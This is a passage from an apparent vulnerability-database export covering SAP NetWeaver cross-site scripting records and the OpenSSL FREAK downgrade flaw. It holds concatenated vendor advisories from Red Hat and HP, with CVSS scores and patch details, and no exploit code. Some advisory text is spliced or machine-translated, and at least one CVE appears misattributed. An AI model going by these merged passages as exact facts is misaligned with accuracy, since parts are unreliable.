            "db": "IVD",
            "id": "3e98d306-1f7f-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "3a022216-1f7f-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "40204c22-1f7f-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "4119fc7c-1f7f-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "4247bd6e-1f7f-11e6-abef-000c29c66e3d"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-4916"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-4917"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-4915"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-4912"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-4914"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-4913"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-4911"
          }
        ],
        "trust": 6.093194613333333
      },
      "iot_taxonomy": {
        "_id": null,
        "data": [
          {
            "category": [
              "ICS"
            ],
            "sub_category": null,
            "trust": 5.6
          }
        ],
        "sources": [
          {
            "db": "IVD",
            "id": "3b9467ec-1f7f-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "3d199b1e-1f7f-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "3e98d306-1f7f-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "3a022216-1f7f-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "40204c22-1f7f-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "4119fc7c-1f7f-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "4247bd6e-1f7f-11e6-abef-000c29c66e3d"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-4916"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-4917"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-4915"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-4912"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-4914"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-4913"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-4911"
          }
        ]
      },
      "last_update_date": "2026-04-10T23:51:14.155000Z",
      "patch": {
        "_id": null,
        "data": [
          {
            "title": "Acknowledgments to Security Researchers - 1546307",
            "trust": 0.8,
            "url": "http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a"
          },
          {
            "title": "Patch for SAP NetWeaver Cross-Site Request Forgery Vulnerability",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchInfo/show/5913"
          },
          {
            "title": "Patch for SAP NetWeaver Feature Access Vulnerability",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchInfo/show/5922"
          },
          {
            "title": "Patch for SAP NetWeaver Command Injection Vulnerability",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchInfo/show/5912"
          },
          {
            "title": "Patch for SAP NetWeaver Cross-Site Scripting Vulnerability",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchInfo/show/5909"
          },
          {
            "title": "Patch for SAP NetWeaver Path Injection Vulnerability",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchInfo/show/5911"
          },
          {
            "title": "Patch for SAP NetWeaver \u0027page\u0027 parameter cross-site scripting vulnerability",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchInfo/show/5910"
          },
          {
            "title": "SAP Netweaver Script Injection Vulnerability Patch",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchInfo/show/5908"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2011-4916"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-4917"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-4915"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-4912"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-4914"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-4913"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-4911"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2011-003325"
          }
        ]
      },
      "problemtype_data": {
        "_id": null,
        "data": [
          {
            "problemtype": "CWE-79",
            "trust": 1.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2011-003325"
          },
          {
            "db": "NVD",
            "id": "CVE-2011-4707"
          }
        ]
      },
      "references": {
        "_id": null,
        "data": [
          {
            "trust": 2.0,
            "url": "http://dsecrg.com/pages/vul/show.php?id=336"
          },
          {
            "trust": 1.7,
            "url": "https://service.sap.com/sap/support/notes/1546307"
          },
          {
            "trust": 1.7,
            "url": "http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a"
          },
          {
            "trust": 1.1,
            "url": "http://www.securityfocus.com/archive/1/520554/100/0/threaded"
          },
          {
            "trust": 1.1,
            "url": "https://erpscan.io/advisories/dsecrg-11-036-sap-netwaver-virus-scan-interface-multiple-xss/"
          },
          {
            "trust": 0.9,
            "url": "http://dsecrg.com/pages/vul/show.php?id=341"
          },
          {
            "trust": 0.9,
            "url": "http://dsecrg.com/pages/vul/show.php?id=335"
          },
          {
            "trust": 0.8,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-4707"
          },
          {
            "trust": 0.8,
            "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2011-4707"
          },
          {
            "trust": 0.6,
            "url": "http://dsecrg.com/pages/vul/show.php?id=340http"
          },
          {
            "trust": 0.6,
            "url": "http://dsecrg.com/pages/vul/show.php?id=339http"
          },
          {
            "trust": 0.6,
            "url": "http://dsecrg.com/pages/vul/show.php?id=336http"
          },
          {
            "trust": 0.6,
            "url": "http://dsecrg.com/pages/vul/show.php?id=338http"
          },
          {
            "trust": 0.6,
            "url": "http://dsecrg.com/pages/vul/show.php?id=337http"
          },
          {
            "trust": 0.6,
            "url": "http://www.securityfocus.com/archive/1/archive/1/520554/100/0/threaded"
          },
          {
            "trust": 0.6,
            "url": "http://erpscan.com/advisories/dsecrg-11-036-sap-netwaver-virus-scan-interface-multiple-xss/"
          },
          {
            "trust": 0.3,
            "url": "http://dsecrg.com/pages/vul/show.php?id=337"
          },
          {
            "trust": 0.3,
            "url": "http://dsecrg.com/pages/vul/show.php?id=339"
          },
          {
            "trust": 0.3,
            "url": "http://dsecrg.com/pages/vul/show.php?id=340"
          },
          {
            "trust": 0.3,
            "url": "http://dsecrg.com/pages/vul/show.php?id=338"
          },
          {
            "trust": 0.3,
            "url": "http://www.sap.com/platform/netweaver/index.epx"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/79.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          },
          {
            "trust": 0.1,
            "url": "https://www.securityfocus.com/bid/50680"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2011-4916"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-4917"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-4915"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-4912"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-4914"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-4913"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-4911"
          },
          {
            "db": "VULMON",
            "id": "CVE-2011-4707"
          },
          {
            "db": "BID",
            "id": "50680"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201112-122"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2011-003325"
          },
          {
            "db": "NVD",
            "id": "CVE-2011-4707"
          }
        ]
      },
      "sources": {
        "_id": null,
        "data": [
          {
            "db": "IVD",
            "id": "3b9467ec-1f7f-11e6-abef-000c29c66e3d",
            "ident": null
          },
          {
            "db": "IVD",
            "id": "3d199b1e-1f7f-11e6-abef-000c29c66e3d",
            "ident": null
          },
          {
            "db": "IVD",
            "id": "3e98d306-1f7f-11e6-abef-000c29c66e3d",
            "ident": null
          },
          {
            "db": "IVD",
            "id": "3a022216-1f7f-11e6-abef-000c29c66e3d",
            "ident": null
          },
          {
            "db": "IVD",
            "id": "40204c22-1f7f-11e6-abef-000c29c66e3d",
            "ident": null
          },
          {
            "db": "IVD",
            "id": "4119fc7c-1f7f-11e6-abef-000c29c66e3d",
            "ident": null
          },
          {
            "db": "IVD",
            "id": "4247bd6e-1f7f-11e6-abef-000c29c66e3d",
            "ident": null
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-4916",
            "ident": null
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-4917",
            "ident": null
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-4915",
            "ident": null
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-4912",
            "ident": null
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-4914",
            "ident": null
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-4913",
            "ident": null
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-4911",
            "ident": null
          },
          {
            "db": "VULMON",
            "id": "CVE-2011-4707",
            "ident": null
          },
          {
            "db": "BID",
            "id": "50680",
            "ident": null
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201112-122",
            "ident": null
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2011-003325",
            "ident": null
          },
          {
            "db": "NVD",
            "id": "CVE-2011-4707",
            "ident": null
          }
        ]
      },
      "sources_release_date": {
        "_id": null,
        "data": [
          {
            "date": "2011-11-16T00:00:00",
            "db": "IVD",
            "id": "3b9467ec-1f7f-11e6-abef-000c29c66e3d",
            "ident": null
          },
          {
            "date": "2011-11-16T00:00:00",
            "db": "IVD",
            "id": "3d199b1e-1f7f-11e6-abef-000c29c66e3d",
            "ident": null
          },
          {
            "date": "2011-11-16T00:00:00",
            "db": "IVD",
            "id": "3e98d306-1f7f-11e6-abef-000c29c66e3d",
            "ident": null
          },
          {
            "date": "2011-11-16T00:00:00",
            "db": "IVD",
            "id": "3a022216-1f7f-11e6-abef-000c29c66e3d",
            "ident": null
          },
          {
            "date": "2011-11-16T00:00:00",
            "db": "IVD",
            "id": "40204c22-1f7f-11e6-abef-000c29c66e3d",
            "ident": null
          },
          {
            "date": "2011-11-16T00:00:00",
            "db": "IVD",
            "id": "4119fc7c-1f7f-11e6-abef-000c29c66e3d",
            "ident": null
          },
          {
            "date": "2011-11-16T00:00:00",
            "db": "IVD",
            "id": "4247bd6e-1f7f-11e6-abef-000c29c66e3d",
            "ident": null
          },
          {
            "date": "2011-11-16T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2011-4916",
            "ident": null
          },
          {
            "date": "2011-11-16T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2011-4917",
            "ident": null
          },
          {
            "date": "2011-11-16T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2011-4915",
            "ident": null
          },
          {
            "date": "2011-11-16T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2011-4912",
            "ident": null
          },
          {
            "date": "2011-11-16T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2011-4914",
            "ident": null
          },
          {
            "date": "2011-11-16T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2011-4913",
            "ident": null
          },
          {
            "date": "2011-11-16T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2011-4911",
            "ident": null
          },
          {
            "date": "2011-12-08T00:00:00",
            "db": "VULMON",
            "id": "CVE-2011-4707",
            "ident": null
          },
          {
            "date": "2011-11-15T00:00:00",
            "db": "BID",
            "id": "50680",
            "ident": null
          },
          {
            "date": "2011-12-09T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201112-122",
            "ident": null
          },
          {
            "date": "2011-12-13T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2011-003325",
            "ident": null
          },
          {
            "date": "2011-12-08T19:55:03.720000",
            "db": "NVD",
            "id": "CVE-2011-4707",
            "ident": null
          }
        ]
      },
      "sources_update_date": {
        "_id": null,
        "data": [
          {
            "date": "2011-11-16T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2011-4916",
            "ident": null
          },
          {
            "date": "2011-11-16T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2011-4917",
            "ident": null
          },
          {
            "date": "2011-11-16T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2011-4915",
            "ident": null
          },
          {
            "date": "2011-11-16T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2011-4912",
            "ident": null
          },
          {
            "date": "2011-11-16T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2011-4914",
            "ident": null
          },
          {
            "date": "2011-11-16T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2011-4913",
            "ident": null
          },
          {
            "date": "2011-11-16T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2011-4911",
            "ident": null
          },
          {
            "date": "2018-12-10T00:00:00",
            "db": "VULMON",
            "id": "CVE-2011-4707",
            "ident": null
          },
          {
            "date": "2013-02-14T12:21:00",
            "db": "BID",
            "id": "50680",
            "ident": null
          },
          {
            "date": "2011-12-09T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201112-122",
            "ident": null
          },
          {
            "date": "2011-12-13T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2011-003325",
            "ident": null
          },
          {
            "date": "2025-04-11T00:51:21.963000",
            "db": "NVD",
            "id": "CVE-2011-4707",
            "ident": null
          }
        ]
      },
      "threat_type": {
        "_id": null,
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201112-122"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "_id": null,
        "data": "SAP NetWeaver Cross-Site Request Forgery Vulnerability",
        "sources": [
          {
            "db": "IVD",
            "id": "3b9467ec-1f7f-11e6-abef-000c29c66e3d"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-4916"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "_id": null,
        "data": "Cross-site scripting",
        "sources": [
          {
            "db": "IVD",
            "id": "3b9467ec-1f7f-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "3d199b1e-1f7f-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "3e98d306-1f7f-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "3a022216-1f7f-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "40204c22-1f7f-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "4119fc7c-1f7f-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "4247bd6e-1f7f-11e6-abef-000c29c66e3d"
          }
        ],
        "trust": 1.4
      }
    }

    VAR-201501-0338

    Vulnerability from variot - Updated: 2026-03-09 22:30

    The ssl3_get_key_exchange function in s3_clnt.c in OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k allows remote SSL servers to conduct RSA-to-EXPORT_RSA downgrade attacks and facilitate brute-force decryption by offering a weak ephemeral RSA key in a noncompliant role, related to the "FREAK" issue. NOTE: the scope of this CVE is only client code based on OpenSSL, not EXPORT_RSA issues associated with servers or other TLS implementations. SSL/TLS Some implementations of export grade without intentional setting (512 Below bit ) of RSA Something accepts the key. Man-in-the-middle attacks against such software (man-in-the-middle attack) Is performed, the key used for encryption is decrypted, SSL/TLS The traffic content may be decrypted. this is" FREAK It is also called “attack”. Algorithm downgrade (CWE-757) CWE-757: Selection of Less-Secure Algorithm During Negotiation ('Algorithm Downgrade') https://cwe.mitre.org/data/definitions/757.html Incorrect cipher strength (CWE-326) CWE-326: Inadequate Encryption Strength https://cwe.mitre.org/data/definitions/326.html SSL/TLS Some implementations of export grade without intentional setting (512 Below bit ) of RSA Something accepts the key. If a man-in-the-middle attack is performed on such software, it is guided to use a weak key in the negotiation at the start of communication, and as a result, encrypted information may be decrypted. The discoverer has released detailed information about this matter. FREAK: Factoring RSA Export Keys https://www.smacktls.com/#freakMan-in-the-middle attacks (man-in-the-middle attack) By SSL/TLS The contents of the communication may be decrypted. OpenSSL is prone to security-bypass vulnerability. Successfully exploiting these issues may allow attackers to perform unauthorized actions by conducting a man-in-the-middle attack. This may lead to other attacks. Description:

    Red Hat JBoss Web Server is a fully integrated and certified set of components for hosting Java web applications. It is comprised of the Apache HTTP Server, the Apache Tomcat Servlet container, Apache Tomcat Connector (mod_jk), JBoss HTTP Connector (mod_cluster), Hibernate, and the Tomcat Native library.

    This release serves as a replacement for Red Hat JBoss Web Server 2.1.0, and includes several bug fixes. Refer to the Red Hat JBoss Web Server 2.1.1 Release Notes, linked to in the References section, for information on the most significant of these changes.

    Security Fix(es):

    • It was discovered that httpd used the value of the Proxy header from HTTP requests to initialize the HTTP_PROXY environment variable for CGI scripts, which in turn was incorrectly used by certain HTTP client implementations to configure the proxy for outgoing HTTP requests. A remote attacker could possibly use this flaw to redirect HTTP requests performed by a CGI script to an attacker-controlled proxy via a malicious HTTP request. (CVE-2016-2106)

    • It was discovered that it is possible to remotely Segfault Apache http server with a specially crafted string sent to the mod_cluster via service messages (MCMP). Solution:

    Before applying the update, back up your existing Red Hat JBoss Web Server installation (including all applications and configuration files).

    The References section of this erratum contains a download link (you must log in to download the update).

    Release Date: 2015-05-19 Last Updated: 2015-05-19

    Potential Security Impact: Remote Denial of Service (DoS) and other vulnerabilities

    Source: Hewlett-Packard Company, HP Software Security Response Team

    VULNERABILITY SUMMARY Potential security vulnerabilities have been identified with HP-UX running OpenSSL. These vulnerabilities could be exploited remotely to create a remote Denial of Service (DoS) and other vulnerabilities.

    References:

    CVE-2015-0204 CVE-2015-0286 CVE-2015-0287 CVE-2015-0289 CVE-2015-0292 CVE-2015-0293 CVE-2015-0209 CVE-2015-0288 SSRT102000

    SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP-UX B.11.11, B.11.23, B.11.31 running OpenSSL versions before v0.9.8zf

    BACKGROUND

    CVSS 2.0 Base Metrics

    Reference Base Vector Base Score CVE-2015-0204 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3 CVE-2015-0286 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2015-0287 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2015-0289 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2015-0292 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2015-0293 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2015-0209 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8 CVE-2015-0288 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002

    RESOLUTION

    HP has provided the following updates to resolve these vulnerabilities. The updates are available from the following URL:

    https://h20392.www2.hp.com/portal/swdepot/displayProductInfo.do?productNumber =OPENSSL11I

    HP-UX Release HP-UX OpenSSL depot name

    B.11.11 (11i v1) OpenSSL_A.00.09.08zf.001_HP-UX_B.11.11_32_64.depot

    B.11.23 (11i v2) OpenSSL_A.00.09.08zf.002_HP-UX_B.11.23_IA-PA.depot

    B.11.31 (11i v3) OpenSSL_A.00.09.08zf.003_HP-UX_B.11.31_IA-PA.depot

    MANUAL ACTIONS: Yes - Update

    Install HP-UX OpenSSL A.00.09.08zf or subsequent

    PRODUCT SPECIFIC INFORMATION

    HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see: https://www.hp.com/go/swa

    The following text is for use by the HP-UX Software Assistant.

    AFFECTED VERSIONS

    HP-UX B.11.11

    openssl.OPENSSL-CER openssl.OPENSSL-CONF openssl.OPENSSL-DOC openssl.OPENSSL-INC openssl.OPENSSL-LIB openssl.OPENSSL-MAN openssl.OPENSSL-MIS openssl.OPENSSL-PRNG openssl.OPENSSL-PVT openssl.OPENSSL-RUN openssl.OPENSSL-SRC action: install revision A.00.09.08zf.001 or subsequent

    HP-UX B.11.23

    openssl.OPENSSL-CER openssl.OPENSSL-CONF openssl.OPENSSL-DOC openssl.OPENSSL-INC openssl.OPENSSL-LIB openssl.OPENSSL-MAN openssl.OPENSSL-MIS openssl.OPENSSL-PRNG openssl.OPENSSL-PVT openssl.OPENSSL-RUN openssl.OPENSSL-SRC action: install revision A.00.09.08zf.002 or subsequent

    HP-UX B.11.31

    openssl.OPENSSL-CER openssl.OPENSSL-CONF openssl.OPENSSL-DOC openssl.OPENSSL-INC openssl.OPENSSL-LIB openssl.OPENSSL-MAN openssl.OPENSSL-MIS openssl.OPENSSL-PRNG openssl.OPENSSL-PVT openssl.OPENSSL-RUN openssl.OPENSSL-SRC action: install revision A.00.09.08zf.003 or subsequent

    END AFFECTED VERSIONS

    HISTORY Version:1 (rev.1) - 20 May 2015 Initial release

    Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.

    Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com.

    Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com

    Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins

    Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/

    Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.

    3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX

    Copyright 2015 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.

    HP ThinPro Linux (x86) v5.1 HP ThinPro Linux (x86) v5.0 HP ThinPro Linux (x86) v4.4 HP ThinPro Linux (x86) v4.3 HP ThinPro Linux (x86) v4.2 HP ThinPro Linux (x86) v4.1 HP ThinPro Linux (ARM) v4.4 HP ThinPro Linux (ARM) v4.3 HP ThinPro Linux (ARM) v4.2 HP ThinPro Linux (ARM) v4.1

    BACKGROUND

    CVSS 2.0 Base Metrics

    Reference Base Vector Base Score CVE-2014-3569 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2014-3570 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 CVE-2014-3571 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2014-3572 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0 CVE-2014-8275 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0 CVE-2015-0204 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0 CVE-2015-0205 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0 CVE-2015-0206 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2015-0235 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002

    RESOLUTION

    HP has released the following software updates to resolve the vulnerability for HP ThinPro Linux.

    Softpaq: http://ftp.hp.com/pub/softpaq/sp70501-71000/sp70649.exe

    Easy Update Via ThinPro / EasyUpdate (x86):

    http://ftp.hp.com/pub/tcdebian/updates/4.1/service_packs/security-sp-2.0-all- 4.1-4.3-x86.xar

    http://ftp.hp.com/pub/tcdebian/updates/4.2/service_packs/security-sp-2.0-all- 4.1-4.3-x86.xar

    http://ftp.hp.com/pub/tcdebian/updates/4.3/service_packs/security-sp-2.0-all- 4.1-4.3-x86.xar

    http://ftp.hp.com/pub/tcdebian/updates/4.4/service_packs/security-sp-2.1-all- 4.4-x86.xar

    http://ftp.hp.com/pub/tcdebian/updates/5.0/service_packs/security-sp-2.1-all- 5.0-5.1-x86.xar

    http://ftp.hp.com/pub/tcdebian/updates/5.1/service_packs/security-sp-2.1-all- 5.0-5.1-x86.xar

    Via ThinPro / EasyUpdate (ARM):

    http://ftp.hp.com/pub/tcdebian/updates/4.1/service_packs/security-sp-2.0-all- 4.1-4.3-armel.xar

    http://ftp.hp.com/pub/tcdebian/updates/4.2/service_packs/security-sp-2.0-all- 4.1-4.3-armel.xar

    http://ftp.hp.com/pub/tcdebian/updates/4.3/service_packs/security-sp-2.0-all- 4.1-4.3-armel.xar

    http://ftp.hp.com/pub/tcdebian/updates/4.4/service_packs/security-sp-2.0-all- 4.4-armel.xar

    Note: Known issue on security-sp-2.0-all-4.1-4.3-arm.xar: With the patch applied, VMware cannot connect if security level is set to "Refuse insecure connections". Updating VMware to the latest package on ftp.hp.com will solve the problem. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1

    ===================================================================== Red Hat Security Advisory

    Synopsis: Moderate: openssl security update Advisory ID: RHSA-2015:0800-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2015-0800.html Issue date: 2015-04-13 CVE Names: CVE-2014-8275 CVE-2015-0204 CVE-2015-0287 CVE-2015-0288 CVE-2015-0289 CVE-2015-0292 CVE-2015-0293 =====================================================================

    1. Summary:

    Updated openssl packages that fix multiple security issues are now available for Red Hat Enterprise Linux 5

    Red Hat Product Security has rated this update as having Moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.

    1. Relevant releases/architectures:

    RHEL Desktop Workstation (v. 5 client) - i386, x86_64 Red Hat Enterprise Linux (v. 5 server) - i386, ia64, ppc, s390x, x86_64 Red Hat Enterprise Linux Desktop (v. 5 client) - i386, x86_64

    1. Description:

    OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) protocols, as well as a full-strength, general purpose cryptography library. (CVE-2015-0204)

    An integer underflow flaw, leading to a buffer overflow, was found in the way OpenSSL decoded malformed Base64-encoded inputs. Note: this flaw is not exploitable via the TLS/SSL protocol because the data being transferred is not Base64-encoded. (CVE-2015-0292)

    A denial of service flaw was found in the way OpenSSL handled SSLv2 handshake messages. A remote attacker could use this flaw to cause a TLS/SSL server using OpenSSL to exit on a failed assertion if it had both the SSLv2 protocol and EXPORT-grade cipher suites enabled. An attacker could use these flaws to modify an X.509 certificate to produce a certificate with a different fingerprint without invalidating its signature, and possibly bypass fingerprint-based blacklisting in applications. (CVE-2014-8275)

    An out-of-bounds write flaw was found in the way OpenSSL reused certain ASN.1 structures. (CVE-2015-0287)

    A NULL pointer dereference flaw was found in OpenSSL's X.509 certificate handling implementation. A specially crafted X.509 certificate could cause an application using OpenSSL to crash if the application attempted to convert the certificate to a certificate request. (CVE-2015-0288)

    A NULL pointer dereference was found in the way OpenSSL handled certain PKCS#7 inputs. TLS/SSL clients and servers using OpenSSL were not affected by this flaw. (CVE-2015-0289)

    Red Hat would like to thank the OpenSSL project for reporting CVE-2015-0287, CVE-2015-0288, CVE-2015-0289, CVE-2015-0292, and CVE-2015-0293. Upstream acknowledges Emilia Käsper of the OpenSSL development team as the original reporter of CVE-2015-0287, Brian Carpenter as the original reporter of CVE-2015-0288, Michal Zalewski of Google as the original reporter of CVE-2015-0289, Robert Dugal and David Ramos as the original reporters of CVE-2015-0292, and Sean Burford of Google and Emilia Käsper of the OpenSSL development team as the original reporters of CVE-2015-0293.

    All openssl users are advised to upgrade to these updated packages, which contain backported patches to correct these issues. For the update to take effect, all services linked to the OpenSSL library must be restarted, or the system rebooted.

    1. Solution:

    Before applying this update, make sure all previously released errata relevant to your system have been applied.

    For details on how to apply this update, refer to:

    https://access.redhat.com/articles/11258

    1. Bugs fixed (https://bugzilla.redhat.com/):

    1180184 - CVE-2015-0204 openssl: only allow ephemeral RSA keys in export ciphersuites (FREAK) 1180187 - CVE-2014-8275 openssl: Fix various certificate fingerprint issues 1202380 - CVE-2015-0287 openssl: ASN.1 structure reuse memory corruption 1202384 - CVE-2015-0289 openssl: PKCS7 NULL pointer dereference 1202395 - CVE-2015-0292 openssl: integer underflow leading to buffer overflow in base64 decoding 1202404 - CVE-2015-0293 openssl: assertion failure in SSLv2 servers 1202418 - CVE-2015-0288 openssl: X509_to_X509_REQ NULL pointer dereference

    1. Package List:

    Red Hat Enterprise Linux Desktop (v. 5 client):

    Source: openssl-0.9.8e-33.el5_11.src.rpm

    i386: openssl-0.9.8e-33.el5_11.i386.rpm openssl-0.9.8e-33.el5_11.i686.rpm openssl-debuginfo-0.9.8e-33.el5_11.i386.rpm openssl-debuginfo-0.9.8e-33.el5_11.i686.rpm openssl-perl-0.9.8e-33.el5_11.i386.rpm

